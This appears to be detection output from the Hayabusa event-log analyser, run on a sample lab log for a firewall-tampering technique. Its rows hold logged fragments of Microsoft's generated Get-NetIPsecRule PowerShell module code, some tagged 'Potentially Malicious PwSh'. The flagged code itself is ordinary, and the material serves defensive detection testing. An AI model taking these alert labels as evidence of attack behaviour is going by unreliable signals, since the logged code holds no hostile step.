[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] 
${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and 